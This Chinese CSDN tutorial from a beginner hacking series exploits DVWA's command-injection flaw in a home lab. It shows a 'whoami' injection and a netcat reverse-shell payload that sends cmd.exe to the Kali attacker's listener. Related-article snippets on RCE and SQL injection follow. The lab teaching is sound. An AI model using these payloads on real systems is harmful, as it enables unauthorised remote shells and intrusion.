黑客零基础第三章-Web漏洞利用第四节-命令注入

最新推荐文章于 2022-04-27 15:22:28 发布

第七感小宇宙

最新推荐文章于 2022-04-27 15:22:28 发布

阅读量2.7k

点赞数 1

分类专栏：零基础黑客训练

本文链接：https://blog.csdn.net/weixin_43879344/article/details/119715091

版权

零基础黑客训练专栏收录该内容

21 篇文章 201 订阅

订阅专栏

本节讲述了DVWA的命令注入漏洞，并通过对这个漏洞的利用，获取靶机的shell，完成入侵。

1.场景

虚拟机：vmware

攻击主机：kali

IP:192.168.239.142

靶机：Windows10

IP:192.168.239.1

服务：xampp启动的DVWA

2.DVWA 命令注入漏洞简介

DVWA中命令注入模块是一个ping命令的执行，

查看源码（此处为了理解漏洞，只学习low级别源码）

对输入没有进行任何过滤。

3.漏洞利用

尝试读取low.php，在输入框框输入

192.168.239.1&&whoami

whoami命令执行。

靶机windows10上装过nc，所以可以通过靶机的nc，获取靶机的shell。

现在kali上开启nc监听4444端口，然后在DVWA上输入以下payload点击submit提交。

192.168.239.1&& nc64.exe -e cmd.exe 192.168.239.142 4444

完成，kali获取了windows10的shell!

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

第七感小宇宙

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
黑客零基础第三章-Web漏洞利用第四节-命令注入

本节讲述了DVWA的命令注入漏洞，并通过对这个漏洞的利用，获取靶机的shell，完成入侵。
复制链接

扫一扫

专栏目录

关于那些Web漏洞--命令注入

shawdow_bug的博客

06-16

438

命令注入漏洞原理

命令执行漏洞—简单利用1（墨者靶场）

weixin_44431280的博客

03-03

1740

命令执行漏洞—简单利用1（墨者靶场）命令执行漏洞原理和简介可参考文章：Web安全—远程命令/代码执行（RCE）命令执行漏洞靶场通关：步骤一：靶场登陆，输入IP地址查看回显。查看Web界面存在输入IP地址的地方，尝试输入环回地址127.0.0.1查看回显输入IP地址127.0.0.1查看回显：步骤二：信息收集判断操作系统，尝试使用系统连接符执行连带命令，例如127.0.0.1;ls。 1，使用Google插件Waapalyzer判断操作系统为Ubuntu（linux），可以使用连接符";"和“管

参与评论您还未登录，请先登录后发表或查看评论

2021-10-28 漏洞利用与远程控制

夕阳的街道的博客

10-28

782

一、实验题目： 漏洞利用与远程控制二、实验内容： 1.使用nmap的【-A】参数对metasploitable进行强力扫描 2.使用kali自带的msfconsole进行渗透测试与远程控制三、环境准备： 1.kali虚拟机（攻击者主机：192.168.112.130） 2.Metasploitable靶机（目标主机：192.168.112.132）四、实验步骤： 1.使用pin...

安全漏洞从原理到实战--命令执行漏洞

SuperZedLv的博客

06-28

678

01 命令执行漏洞即黑客可以通过控制参数执行系统命令，形成原因是开发人员对用户输入参数安全检查不足从而导致的恶意命令执行。 02 常见的系统命令执行函数 Php命令执行函数eval()函数、assert()、preg_replace()、call_user_func()等。Java命令执行函数exec()函数等。 03 实战目标 Ubuntu16.04 DVWA系统 IP：192.168.1.5 攻击 Kali Linux

栈溢出脚本_栈溢出攻击详解基础篇

weixin_39522408的博客

11-20

344

栈溢出是缓冲区溢出的一种，而缓冲区溢出这一漏洞可以追溯到世界上最早的蠕虫病毒“莫里斯”。这是黑客们最广为关注与应用的漏洞，在公共漏洞库的报告中，缓冲区溢出类漏洞牢牢占据漏洞数量榜首。其中由于计算机执行指令很大程度依赖堆栈，同时编程语言疏忽内在检查机制，栈溢出漏洞层出不穷。数据来自信息安全漏洞门户cve.scap.org.cn黑客们到底拿这个漏洞在做什么？为了在目标系统中为所欲为，黑客需要...

白帽子修炼第二步(漏洞篇)[SQL注入]-③

05-29

在这个训练课程中，"米斯特web安全培训第一期，漏洞篇-SQL注入"可能会涵盖如何识别SQL注入漏洞、理解SQL语法结构、构造有效的注入语句以及防御策略等内容。例如，"mysql手工注入语句大全.txt"文件可能包含了各种...

006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf

最新发布

07-09

通过以上题目的练习，学习者可以深入理解Web安全的常见漏洞，如SQL注入、XSS、CSRF、文件包含、权限绕过等，并掌握相应的防御和利用策略。此外，题目还锻炼了选手的逻辑思维、逆向工程和数据分析能力，对于提升Web...

第一章 Web安全概述1

08-03

* 黑客攻击：黑客可能会使用各种手段攻击Web应用程序，例如SQL注入、跨站脚本攻击等。 * 恶意软件：恶意软件可能会感染Web应用程序，导致安全漏洞。 * 人为错误：人为错误可能会导致Web安全漏洞，例如弱密码、未更新...

《SQL注入攻击与防御（第2版）》- SQL Injection Attacks and Defense 英文原版下载

06-06

SQL注入攻击是黑客利用应用程序中的漏洞，将恶意SQL代码插入到数据库查询中，从而获取、修改或破坏敏感数据，甚至完全控制数据库服务器。本书的目的是提供对这种攻击方式的深入理解和防御策略。 SQL注入攻击的基本...

第03天：基础入门-搭建安全拓展1

08-03

"第03天：基础入门-搭建安全拓展1"这个主题主要关注的是在建立和扩展网络基础设施时如何确保安全性。以下是一些关键知识点的详细解释： 1. **常见搭建平台脚本启用**：在搭建网站时，我们通常会使用各种编程语言...

【渗透练习系列】DVWA的一次登录后通过Sqlmap拿到os-shell，命令执行写入一句话-01

书山上的云的博客

01-19

4371

一、前言本次将通过DVWA靶机来展示怎样通过Sqlmap获取目标os-shell，得到命令执行权限，从而写入一句话木马，持续控制目标服务器。二、测试 1.打开目标站点：http://192.200.30.126/DVWA/login.php，从网页后缀和wappalyzer浏览器插件来看，站点的编程语言为PHP。 2.输入账号跟密码登录后台，同时开启Burp抓取http包。获取登录后的Cookie值: 3.找到存在SQL注入的模块。获取URL。 http://192.200.30.126/DVWA/v

php命令注入攻击

热门推荐

vergilben的学习日记

04-01

1万+

这次实验内容为了解php命令注入攻击的过程，掌握思路。命令注入攻击命令注入攻击（Command Injection），是指黑客通过利用HTML代码输入机制缺陷(例如缺乏有效验证限制的表格域)来改变网页的动态生成的内容。从而可以使用系统命令操作，实现使用远程数据来构造要执行的命令的操作。 PHP中可以使用下列四个函数来执行外部的应用程序或函数：system、exec、passthru、shell...

whoami靶场渗透测试

西电卢本伟的博客

04-27

3331

靶机渗透，文件下载，上传，包含漏洞，sql注入漏洞，提权

命令执行漏洞的原理：

BAIXUAN9527的博客

02-26

1876

命令执行漏洞的原理：在操作系统中， & 、&& 、| 、 || 都可以作为命令连接符使用，用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令可以看到，low级别的代码接收了用户输入的ip，然后根据服务器是否是Windows NT系统，对目标ip进行不同的ping测试。但是这里对用户输入的ip并没有进行任何的过...

DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]

King_Ho的博客

12-21

2897

MSF攻击Windows实验：方法一 :通过web站点，使用无文件的方式攻击利用执行方法二:通过web站点，上传webshell, 返回给msf 方法三:攻击其他端口服务，拿到meterpreter 信息收集-Nmap端口扫描信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p

手工挖洞学习笔记：dvwa命令执行漏洞/载入php反弹shell

AI_Jardon的博客

08-13

1313

命令执行漏洞工具：（1）靶机：Metasploitable2 （2）nc （3）kali dvwa 代码审计：安全级别为low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Wi

Web安全——命令注入漏洞详解

Boom！脑洞大爆炸的博客

06-09

1万+

手把手入门命令注入漏洞

docker的命令

goubi4056的博客

09-09

826

容器生命周期管理命令 run start/stop/restart kill rm pause/unpause create exec 容器操作命令 ps docker ps : 列出容器语法 docker ps [OPTIONS] OPTIONS说明： -a :显示所有的容器，包括未运行的 -f :根据条件过滤显示的内容 --format :指定返回值的模板文件 -l :显示最近创建的容器 -n :列出最近创建的n个容器 --no-trunc :不截断输出 -q :静默模式，只显示容器编号 -s :显

iptables实现主机防火墙与网络防火墙

xiaochenwj1995的博客

09-08

1201

只能访问本机的22和80端口 iptables -A INPUT -s 192.168.239.1 -j ACCEPT iptables -A OUTPUT -d 192.168.239.1 -j ACCEPT iptables -A INPUT -j REJECT iptables -A OUTPUT -j REJECT iptables -vnL iptables -I INPUT -p tc...

Web安全漏洞全解析：14类常见问题与防范措施

WEB安全漏洞集锦是一份关于Web应用程序安全的重要指南，主要关注常见的漏洞类型及其解决方案。这份文档列举了14种关键的安全问题，包括： 1. **SQL注入漏洞**： - 描述：SQL注入是一种攻击手段，攻击者通过提交...